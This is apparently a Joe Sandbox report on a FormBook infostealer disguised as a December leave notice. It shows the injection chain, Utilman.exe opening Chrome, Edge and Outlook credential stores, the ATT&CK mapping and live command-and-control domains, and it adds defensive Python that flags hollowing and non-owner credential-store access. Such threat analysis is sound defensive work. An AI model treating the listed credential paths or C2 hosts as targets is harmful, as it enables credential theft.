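# Directories that hold legitimate Windows binaries (lower-cased, trailing slash).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Accessibility helpers that winlogon/explorer start; any other parent is abnormal
# (assumed list, the report only shows Utilman.exe).
ACCESSIBILITY = {"utilman.exe", "sethc.exe", "osk.exe", "magnify.exe",
                 "narrator.exe", "displayswitch.exe", "atbroker.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the executable actually mapped
    command_line: str   # command line the process was created with
    parent_image: str   # full path of the creating process


def first_token(cmd: str) -> str:
    """Executable as named in a Windows command line (handles a quoted argv[0])."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def flag_event(ev: ProcEvent) -> list[str]:
    """Return the reasons this event matches the chain in the report (empty if none)."""
    reasons = []
    image, parent = base(ev.image), base(ev.parent_image)
    # 1. Image path and argv[0] disagree: the process was created with another
    #    program's command line, the footprint of process hollowing.
    if base(first_token(ev.command_line)) != image:
        reasons.append("image/command-line mismatch (hollowing indicator)")
    # 2. An accessibility binary started by something outside the Windows dirs.
    if image in ACCESSIBILITY and not in_system_dir(ev.parent_image):
        reasons.append("accessibility binary started by non-system parent")
    # 3. A browser started by an accessibility binary (injection-target setup).
    if image in BROWSERS and parent in ACCESSIBILITY:
        reasons.append("browser spawned by accessibility binary")
    return reasons


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map pid -> reasons for every event that trips at least one rule."""
    return {ev.pid: r for ev in events if (r := flag_event(ev))}


# Constructed events mirroring the three 'Process created' rows; PIDs are made up.
SAMPLE = r"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
DROPPED = r"C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe"
EVENTS = [
    ProcEvent(1001, r"C:\Windows\SysWOW64\svchost.exe", f'"{SAMPLE}"', SAMPLE),
    ProcEvent(1002, r"C:\Windows\SysWOW64\Utilman.exe",
              r'"C:\Windows\SysWOW64\Utilman.exe"', DROPPED),
    ProcEvent(1003, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
              r"C:\Windows\SysWOW64\Utilman.exe"),
    # Benign control: explorer starting notepad with a plain argument.
    ProcEvent(1004, r"C:\Windows\System32\notepad.exe",
              "notepad.exe readme.txt", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, reasons in triage(EVENTS).items():
        print(pid, "; ".join(reasons))
```

Rule 1 is the high-value one: a legitimate svchost.exe is always started by services.exe with a `-k` group command line, so any svchost.exe whose argv[0] names another executable is worth an alert on its own. Rules 2 and 3 are narrower and exist to catch the rest of this chain; on a real fleet the parent allowlist for accessibility binaries needs winlogon.exe and explorer.exe checked by full path, not basename.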

                Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\Utilman.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: WIN_81
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: WIN_XP
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: WIN_XPe
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: WIN_VISTA
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: WIN_7
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: WIN_8
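The "File opened" and "Key opened" rows above show Utilman.exe, not a browser or mail client, reading the Chrome and Edge credential databases (Login Data, Cookies, Web Data, Local State) and the Outlook profile key. The following Python is an added example and not part of the Joe Sandbox report: a checker that flags every credential-store access whose acting image is not the store's owner, run over constructed file-open and registry-open events mirroring those rows. The store patterns, owner mapping and events are assumptions; the Chrome pattern is written to match the real root-level Local State as well as the profile-level paths the sandbox logged.

```python
import ntpath
import re
from typing import Optional

# Credential-bearing artefacts named in the report and the image that owns each one.
# Matching is done on the lower-cased path; the optional group absorbs the profile
# folder (Default\, Default\Network\) so the root-level Local State also matches.
FILE_STORES = [
    ("Chrome", re.compile(r"\\google\\chrome\\user data\\(.*\\)?(login data|cookies|web data|local state)$"), "chrome.exe"),
    ("Edge", re.compile(r"\\microsoft\\edge\\user data\\(.*\\)?(login data|cookies|web data|local state)$"), "msedge.exe"),
]
REG_STORES = [
    ("Outlook profile", re.compile(r"\\windows messaging subsystem\\profiles\\"), "outlook.exe"),
]


def classify(kind: str, target: str) -> Optional[tuple]:
    """Return (store_name, owning_image) if target is a known credential store, else None."""
    t = target.lower()
    for name, pattern, owner in (FILE_STORES if kind == "file" else REG_STORES):
        if pattern.search(t):
            return name, owner
    return None


def flag_access(events: list) -> list:
    """Keep every event where a credential store is opened by an image other than its owner."""
    hits = []
    for ev in events:
        hit = classify(ev["kind"], ev["target"])
        if hit is None:
            continue
        store, owner = hit
        actor = ntpath.basename(ev["process"]).lower()
        if actor != owner:
            hits.append({"process": actor, "store": store, "target": ev["target"]})
    return hits


# Constructed events mirroring the rows above, plus a temp file and a benign
# chrome.exe access as controls.
UTILMAN = r"C:\Windows\SysWOW64\Utilman.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EVENTS = [
    {"process": UTILMAN, "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": UTILMAN, "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"process": UTILMAN, "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"process": UTILMAN, "kind": "registry",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
    {"process": UTILMAN, "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Temp\foo.tmp"},
    {"process": CHROME, "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for hit in flag_access(EVENTS):
        print(hit["process"], "->", hit["store"], hit["target"])
```

The owner check is deliberately strict: on a real host the allowlist needs the backup agent, the browser's own updater and crash handler, and any password manager with a browser bridge, otherwise the rule is noisy. What should never be on that list is a Windows binary from System32 or SysWOW64 such as Utilman.exe, which has no reason to open a Login Data file.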

                Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Mitre Att&ck Matrix

The matrix is listed per tactic column. A number in parentheses is the count shown in the original matrix for that technique (the signatures the report maps to it); techniques without a number are the matrix's standard placeholders and were not observed.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1560288; sample: Mandatory Notice for all December Leave and Vacation application.exe; start date 21/11/2024; architecture: WINDOWS; score 100)

Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures. Hosts at sample level: www.tals.xyz (Performs DNS queries to domains with low reputation), www.sipdontshoot.net, 6 other IPs or domains.

Process chain as drawn in the graph:
Mandatory Notice for all December Leave and Vacation application.exe (started)
  signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> svchost.exe (started)
     signatures: Maps a DLL or memory area into another process
     -> eAdBvdCMNQkVZK.exe (injected)
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> Utilman.exe (started)
           signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
           -> eAdBvdCMNQkVZK.exe (injected)
              signatures: Found direct / indirect Syscall (likely to bypass EDR)
              network: www.sipdontshoot.net 216.40.34.41 (source ports 49985, 49986, 49987; TUCOWSCA, Canada); www.hobbihub.info 209.74.77.108 (source ports 49993, 49994, 49995; MULTIBAND-NEWHOPEUS, United States); 5 other IPs or domains
           -> firefox.exe (started)

Source | Detection | Scanner | Label
Mandatory Notice for all December Leave and Vacation application.exe | 37% | ReversingLabs | Win32.Trojan.AutoitInject
Mandatory Notice for all December Leave and Vacation application.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
https://www.hover.com/domains/results | 0% | Avira URL Cloud | safe
https://www.hover.com/transfer_in?source=parked | 0% | Avira URL Cloud | safe
https://www.hover.com/email?source=parked | 0% | Avira URL Cloud | safe
https://www.hover.com/privacy?source=parked | 0% | Avira URL Cloud | safe
https://login.live.c | 0% | Avira URL Cloud | safe
http://www.rgenerousrs.store/zr8v/ | 0% | Avira URL Cloud | safe
https://www.hover.com/domain_pricing?source=parked | 0% | Avira URL Cloud | safe
https://www.hover.com/about?source=parked | 0% | Avira URL Cloud | safe
https://www.hover.com/renew?source=parked | 0% | Avira URL Cloud | safe
http://www.tals.xyz/stx5/ | 0% | Avira URL Cloud | safe
http://www.sipdontshoot.net/ejy6/ | 0% | Avira URL Cloud | safe
http://www.hobbihub.info/i5gf/ | 0% | Avira URL Cloud | safe
http://www.conansog.shop/us5e/ | 0% | Avira URL Cloud | safe
https://www.hover.com/tos?source=parked | 0% | Avira URL Cloud | safe
http://www.76kdd.top | 0% | Avira URL Cloud | safe
http://www.76kdd.top/6rpr/ | 0% | Avira URL Cloud | safe
https://www.hover.com/?source=parked | 0% | Avira URL Cloud | safe
https://help.hover.com/home?source=parked | 0% | Avira URL Cloud | safe
https://www.hover.com/tools?source=parked | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.hobbihub.info | 209.74.77.108 | true | true | | unknown
76kdd.top | 38.47.232.194 | true | true | | unknown
www.conansog.shop | 104.21.41.74 | true | true | | unknown
www.sipdontshoot.net | 216.40.34.41 | true | true | | unknown
www.tals.xyz | 13.248.169.48 | true | true | | unknown
www.rgenerousrs.store | 172.67.167.146 | true | true | | unknown
www.7261ltajbc.bond | 154.12.28.184 | true | true | | unknown
www.76kdd.top | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.rgenerousrs.store/zr8v/ | true | Avira URL Cloud: safe | unknown
http://www.tals.xyz/stx5/ | true | Avira URL Cloud: safe | unknown
http://www.hobbihub.info/i5gf/ | true | Avira URL Cloud: safe | unknown
http://www.conansog.shop/us5e/ | true | Avira URL Cloud: safe | unknown
http://www.76kdd.top/6rpr/ | true | Avira URL Cloud: safe | unknown
http://www.sipdontshoot.net/ejy6/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.hover.com/domain_pricing?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hover.com/privacy?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://twitter.com/hover | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.instagram.com/hover_domains | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.hover.com/transfer_in?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hover.com/renew?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.live.c | Utilman.exe, 00000005.00000002.4579598695.0000000002B6F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.hover.com/email?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hover.com/about?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.hover.com/domains/results | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hover.com/tos?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.76kdd.top | eAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.hover.com/tools?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://help.hover.com/home?source=parked | Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hover.com/?source=parked | eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.tals.xyz | United States | 16509 | AMAZON-02US | true
209.74.77.108 | www.hobbihub.info | United States | 31744 | MULTIBAND-NEWHOPEUS | true
172.67.167.146 | www.rgenerousrs.store | United States | 13335 | CLOUDFLARENETUS | true
154.12.28.184 | www.7261ltajbc.bond | United States | 174 | COGENT-174US | true
38.47.232.194 | 76kdd.top | United States | 174 | COGENT-174US | true
104.21.41.74 | www.conansog.shop | United States | 13335 | CLOUDFLARENETUS | true
216.40.34.41 | www.sipdontshoot.net | Canada | 15348 | TUCOWSCA | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560288
Start date and time: 2024-11-21 16:14:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Mandatory Notice for all December Leave and Vacation application.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@7/7
                                                    EGA Information:
                                                    • Successful, ratio: 66.7%
                                                    HCA Information:
                                                    • Successful, ratio: 86%
                                                    • Number of executed functions: 52
                                                    • Number of non-executed functions: 292
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Mandatory Notice for all December Leave and Vacation application.exe
Time | Type | Description
10:16:20 | API Interceptor | 9183335x Sleep call for process: Utilman.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | Thermo Fisher Scientific - Ajánlatkérés.exe | malicious | FormBook | www.tals.xyz/k1td/
 | DOC_114542366.vbe | malicious | FormBook | www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.remedies.pro/hrap/
 | SWIFT COPY 0028_pdf.exe | malicious | FormBook | www.optimismbank.xyz/lnyv/
 | New Order - RCII900718_Contract Drafting.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
 | need quotations.exe | malicious | FormBook | www.egldfi.xyz/3e55/
 | Quotation request -30112024_pdf.exe | malicious | FormBook | www.tals.xyz/010v/
 | Arrival Notice.exe | malicious | FormBook | www.wajf.net/dkz5/
 | rG5EzfUhUp.exe | malicious | Sakula RAT | www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
 | dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook | www.extrem.tech/ikn1/
209.74.77.108 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.mindfulmo.life/grm8/
38.47.232.194 | DOC_114542366.vbe | malicious | FormBook | www.76kdd.top/idu4/?KV=qD8cAnDgckBLYUQoRh7zBwgp4vAR8SH4vArrPOMmIDAln/sBv7g5z1sASbSU3sLbiWKHdb75VGXih9cbyGRF9rbA94O5jPyz1SB60B/cp/B1u7O6lua4pvo=&Wno=a0qDq
 | Hire P.O.exe | malicious | FormBook | www.zz67x.top/45n6/
 | Order.exe | malicious | FormBook | www.zz67x.top/45n6/
 | SDBARVe3d3.exe | malicious | FormBook | www.zz67x.top/45n6/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.rgenerousrs.store | RFQ 3100185 MAHAD.exe | malicious | FormBook | 188.114.97.3
www.conansog.shop | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 172.67.162.12
 | FOTOĞRAFLAR.exe | malicious | FormBook | 104.21.41.74
www.tals.xyz | Thermo Fisher Scientific - Ajánlatkérés.exe | malicious | FormBook | 13.248.169.48
 | Quotation request -30112024_pdf.exe | malicious | FormBook | 13.248.169.48
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://xmrminingproxy.com | malicious | Unknown | 104.21.6.188
 | Loader.exe | malicious | LummaC | 104.21.66.38
 | VMX.exe | malicious | LummaC | 172.67.198.61
 | Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk | malicious | Ducktail | 104.21.15.40
 | https://spacardportal.works.com/gar | malicious | Unknown | 104.18.86.42
 | ADZ Laucher.exe | malicious | LummaC | 172.67.155.248
 | Loader.exe | malicious | LummaC | 172.67.219.199
 | Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk | malicious | Ducktail | 172.67.161.101
 | S0FTWARE.exe | malicious | Stealc, Vidar | 172.64.41.3
